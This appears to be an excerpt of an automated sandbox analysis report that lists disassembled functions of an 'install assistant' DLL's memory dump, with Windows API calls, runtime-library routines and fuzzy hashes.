                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C22EF64,6C256DD8,0000000C), ref: 6C234A55
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast_free
                              • String ID:
                              • API String ID: 2283115069-0
                              • Opcode ID: 25ae3816dbc91cb4110e442c1af4eaa14fb56559cc372c3b8bd714b6b21a4b01
                              • Instruction ID: ae3ade90dee2358f90727019f1efaae5bbff113706958ea4aaf10bd0faab6e16
                              • Opcode Fuzzy Hash: 25ae3816dbc91cb4110e442c1af4eaa14fb56559cc372c3b8bd714b6b21a4b01
                              • Instruction Fuzzy Hash: 8A11E7F23041296BDE005AB95CC8D5A3B6DEBC277D7252769FD2CA2BC0DF368C094528
                              APIs
                              • WriteConsoleW.KERNEL32(00000000,?,6C2446EC,00000000,00000000,?,6C244B51,00000000,00000001,00000000,6C23B0D0,?,6C23C286,?,?,6C23B0D0), ref: 6C245ED1
                              • GetLastError.KERNEL32(?,6C244B51,00000000,00000001,00000000,6C23B0D0,?,6C23C286,?,?,6C23B0D0,?,6C23B0D0,?,6C23BD1C,6C245AB6), ref: 6C245EDD
                                • Part of subcall function 6C245F2E: CloseHandle.KERNEL32(FFFFFFFE,6C245EED,?,6C244B51,00000000,00000001,00000000,6C23B0D0,?,6C23C286,?,?,6C23B0D0,?,6C23B0D0), ref: 6C245F3E
                              • ___initconout.LIBCMT ref: 6C245EED
                                • Part of subcall function 6C245F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C245EAB,6C244B3E,6C23B0D0,?,6C23C286,?,?,6C23B0D0,?), ref: 6C245F22
                              • WriteConsoleW.KERNEL32(00000000,?,6C2446EC,00000000,?,6C244B51,00000000,00000001,00000000,6C23B0D0,?,6C23C286,?,?,6C23B0D0,?), ref: 6C245F02
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                              • String ID:
                              • API String ID: 2744216297-0
                              • Opcode ID: 206263c66f9381500dd205cdbe3cb923e010c7983bc129b1bc9a0d814e796d6e
                              • Instruction ID: 23db9cea9f3ce4aa0ea8ab30a91abef84afee3c527b33261d501f331a85ea984
                              • Opcode Fuzzy Hash: 206263c66f9381500dd205cdbe3cb923e010c7983bc129b1bc9a0d814e796d6e
                              • Instruction Fuzzy Hash: 2CF03737500119BBCF121FA1DC089CA7F76FF06761B058024FE5985160CB328C24DB91
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C25E077
                                • Part of subcall function 6C25DFF5: __EH_prolog.LIBCMT ref: 6C25DFFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :$\
                              • API String ID: 3519838083-1166558509
                              • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                              • Instruction ID: 8faa55f7af8285ecc6c54ff0765747330e0c2d9bf32e1c93ca72f5f9c94220d1
                              • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                              • Instruction Fuzzy Hash: 86E1C27090020EDACF11DFA4C590BEFB7B1AF0531CF908119EC55A7B90EB79A969CB91
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog__aullrem
                              • String ID: d%K
                              • API String ID: 3415659256-3110269457
                              • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                              • Instruction ID: a6473eda6048e3a83026278805547db3bec26bc006ed3c729177618745f540f3
                              • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                              • Instruction Fuzzy Hash: 4981AC71A0120EDFDB01CF94C484BAEB7F5AF4434AF248069EC19ABA41D771D90ACFA4
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog3_
                              • String ID: 8Q
                              • API String ID: 2427045233-4022487301
                              • Opcode ID: 35e413f186f6e2f2ff3432f68761e1d2188ac7eec3ea4108b9eb42068a33f480
                              • Instruction ID: 5922fc2e3a1115233c442874fbc6512c23cce8bf706d7c622560c17e5d30692e
                              • Opcode Fuzzy Hash: 35e413f186f6e2f2ff3432f68761e1d2188ac7eec3ea4108b9eb42068a33f480
                              • Instruction Fuzzy Hash: 5E71C7B1D0122E9FDB108F96C880AEE7B75BF05319F14A215FC186BA50DF758A47C7A0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$hfJ
                              • API String ID: 3519838083-1391159562
                              • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                              • Instruction ID: 7d1eb2480cea2c4907ec45228e91ccd5ddfc52fca25b5ea94e70a08cdf806520
                              • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                              • Instruction Fuzzy Hash: 6191297091124DEFCB20DFA9C8949DEFBF4BF18308F54451EE956A7A90D770AA48CB21
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C278C5D
                                • Part of subcall function 6C27761A: __EH_prolog.LIBCMT ref: 6C27761F
                                • Part of subcall function 6C277A2E: __EH_prolog.LIBCMT ref: 6C277A33
                                • Part of subcall function 6C278EA5: __EH_prolog.LIBCMT ref: 6C278EAA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: WZJ
                              • API String ID: 3519838083-1089469559
                              • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction ID: 19c5c596d3511dd0c32a534cabd10e50646632358cb5e332081079bf21afe786
                              • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                              • Instruction Fuzzy Hash: E6815A31D0125DDFCF25DFA8D990ADEB7B4AF19318F10409AE816B7790DB30AA19CB61
                              APIs
                              • ___std_exception_destroy.LIBVCRUNTIME ref: 6C0F2A76
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ___std_exception_destroy
                              • String ID: Jbx$Jbx
                              • API String ID: 4194217158-1161259238
                              • Opcode ID: 12219a74225ed660d9303e33e152864f754509327e6b4924b226299691c70e0a
                              • Instruction ID: 9c2e0189bd0c27eef9c4543792e214d457e93661ea5947be8cd94a7e5dbc7d70
                              • Opcode Fuzzy Hash: 12219a74225ed660d9303e33e152864f754509327e6b4924b226299691c70e0a
                              • Instruction Fuzzy Hash: 5D5154B19002448FCB14CF58D884A9EBBF5EF89314F10846DEC699B741D335E996CF92
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: <dJ$Q
                              • API String ID: 3519838083-2252229148
                              • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                              • Instruction ID: 7f6b49870417e8d6afc61aa154971f8f0855d42c98f05fe45a0f9c5628cda669
                              • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                              • Instruction Fuzzy Hash: 75518E7190624EEFCF00DF98C8808EEB7B1BF49318F54851EF915ABA90DB319949DB11
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $D^J
                              • API String ID: 3519838083-3977321784
                              • Opcode ID: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                              • Instruction ID: 3dfb4dc2b62de7dc6c6c8008e79ad0200877f1e876562691717549c35a1c8119
                              • Opcode Fuzzy Hash: 592ff2149492c1b5d1f5267e2a791cd36de2b3efa6476b1a9cfe308cba17f1e8
                              • Instruction Fuzzy Hash: 6D419961A0459E6EDF32AF29C4D4BEDBBA19F07308F149158EC9247E85DB74498BC3B0
                              APIs
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C2446D6), ref: 6C23D01B
                              • __dosmaperr.LIBCMT ref: 6C23D022
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr
                              • String ID: 8Q
                              • API String ID: 1659562826-4022487301
                              • Opcode ID: 0f09e370f320931353a26e715848f330b254b6d873e7847e51ddadbbe8727cbc
                              • Instruction ID: 19e8619c4de10bf210640bf5049d921b839eafd2385fdea8cd44af489d0d1544
                              • Opcode Fuzzy Hash: 0f09e370f320931353a26e715848f330b254b6d873e7847e51ddadbbe8727cbc
                              • Instruction Fuzzy Hash: 4041A8F16242BDAFCB11AF28CC80BA97FA5EB46B08F14535AFC8887605D7358D118790
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: X&L$p|J
                              • API String ID: 3519838083-2944591232
                              • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                              • Instruction ID: 606c6cea63c4fbad7ac42b3c3c76b58ade994d409e2c31710ff5ba64dcedc2e6
                              • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                              • Instruction Fuzzy Hash: 52312E31F9510EDBD7009B5EDD01FAE7771EB1132BF500336ED10A6EA0CB608596CA52
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0|J$`)L
                              • API String ID: 3519838083-117937767
                              • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction ID: c7286136e39dd2fdd2c771df797196ba94cabde7e1423235c28de8db879ae20f
                              • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                              • Instruction Fuzzy Hash: D941E27960174AEFDB119F61C490BEBBBE2FF45209F00442EE86A97760CB316915CBA1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv
                              • String ID: 3333
                              • API String ID: 3732870572-2924271548
                              • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction ID: 60dda91d7160cd0006ddd9a90222c64710df45bfc8fc26b39194919b294d001c
                              • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                              • Instruction Fuzzy Hash: 9B21BAB494070C6FE734CFAA8880B5BFAFDEB44B14F10891EB586D3B40DB70A9448765
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free
                              • String ID: dU2l$hU2l
                              • API String ID: 269201875-3009053071
                              • Opcode ID: b580c06e976e98bddd8c3fa3fbd88729562a74f251c2a5fd038498b23bf7ae67
                              • Instruction ID: 50c771897059321980b8bf08bd2e1f35bc8292f96e3387a10e1337efa9b0729f
                              • Opcode Fuzzy Hash: b580c06e976e98bddd8c3fa3fbd88729562a74f251c2a5fd038498b23bf7ae67
                              • Instruction Fuzzy Hash: 1511D6B520431A8BE7108F29D480B8277E4EB05799B20542FE99DCBB80EB71E5848F90
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$LuJ
                              • API String ID: 3519838083-205571748
                              • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction ID: 8a2e21f9cd67e159d4b3cc905f32f6fe0998bf954b07a4af76a3fb68d2e73423
                              • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                              • Instruction Fuzzy Hash: 890184B1E0138EDAEB10DFDA84809AEF7B4FF59704F40842EE969E3A40C3745945CB59
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @$xMJ
                              • API String ID: 3519838083-951924499
                              • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction ID: 50b77cdd4ea1c0534f859a9b4b11f8f86b006846f9fdf47a3ab79e9dd5289b5b
                              • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                              • Instruction Fuzzy Hash: F5115E71A0024ADBCF00EF9AC49059EB7B4FF18748B50C46EE869E7B00D7349A45CB65
                              APIs
                              • _free.LIBCMT ref: 6C23DD49
                              • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C23A63A,?,00000004,?,4B42FCB6,?,?,6C22F78C,4B42FCB6,?), ref: 6C23DD85
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: AllocHeap_free
                              • String ID: 8Q
                              • API String ID: 1080816511-4022487301
                              • Opcode ID: ffa6cd5f1a806bf522ce29122d99795d7a55cdf369fc66bd93a3a9d079798cc1
                              • Instruction ID: da149e7a981cd19c7c921d0f7e27185a869bd2290562d3af2f9ea193954e8f77
                              • Opcode Fuzzy Hash: ffa6cd5f1a806bf522ce29122d99795d7a55cdf369fc66bd93a3a9d079798cc1
                              • Instruction Fuzzy Hash: 17F0C8BB62123E66DB231A269C44F9B37698FC3675F116115FD1C97E90DF20D404C1E0
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C28F746
                                • Part of subcall function 6C28F7BF: __EH_prolog.LIBCMT ref: 6C28F7C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: uB)l$sJ
                              • API String ID: 3519838083-2241131741
                              • Opcode ID: 479f86800d12ad63e1b8ae242903cd26d6f9166e8cc8054c33d6365a60c3e9bf
                              • Instruction ID: ced32d994909ce99453b897ace2d4104af8bd518fcd57e3d568fcfe9aabb8224
                              • Opcode Fuzzy Hash: 479f86800d12ad63e1b8ae242903cd26d6f9166e8cc8054c33d6365a60c3e9bf
                              • Instruction Fuzzy Hash: C801A271A0000CEBDF01BBA4C841AEEBB65EF85718F00401AE94192690CF74496ACB91
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prologctype
                              • String ID: |zJ
                              • API String ID: 3037903784-3782439380
                              • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                              • Instruction ID: f4b2d7323770cf5c80bb8c690d72e5c4f7eec16073d40455f1577e1cdf97ecbc
                              • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                              • Instruction Fuzzy Hash: 81E02B326051199BE705CF49C800BDEF3A4FF54B25F11401FE81AA3A40CBF0A810C782
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prologctype
                              • String ID: <oJ
                              • API String ID: 3037903784-2791053824
                              • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction ID: 92e84e91ac7e84eea3742eb64862ba240868bf3387235784645e5754b5c7689e
                              • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                              • Instruction Fuzzy Hash: 3DE0ED32A12119DBEB049F0CC820BDEF7A4EF41728F11011EE821A3BC1CFB1A8148680
                              APIs
                              • AcquireSRWLockExclusive.KERNEL32(6C32466C,?,?,652EF5AA,6C0F22D8,6C32430C), ref: 6C226AB9
                              • ReleaseSRWLockExclusive.KERNEL32(6C32466C), ref: 6C226AF3
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ExclusiveLock$AcquireRelease
                              • String ID: lF2l
                              • API String ID: 17069307-2379685847
                              • Opcode ID: e73f90c6533bc8638a0d910587183b7bdb458e6d9cc9952af7f3fd62ffa9874d
                              • Instruction ID: 1640a4b96a9eb103f99633aad0ed7342cb3e80ccb79ed6b9074db6fde1d390f1
                              • Opcode Fuzzy Hash: e73f90c6533bc8638a0d910587183b7bdb458e6d9cc9952af7f3fd62ffa9874d
                              • Instruction Fuzzy Hash: 2AF0A736640505DFCB105F15D484E66B7B9EB47735F14422DED5583AD0D7381852CA61
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
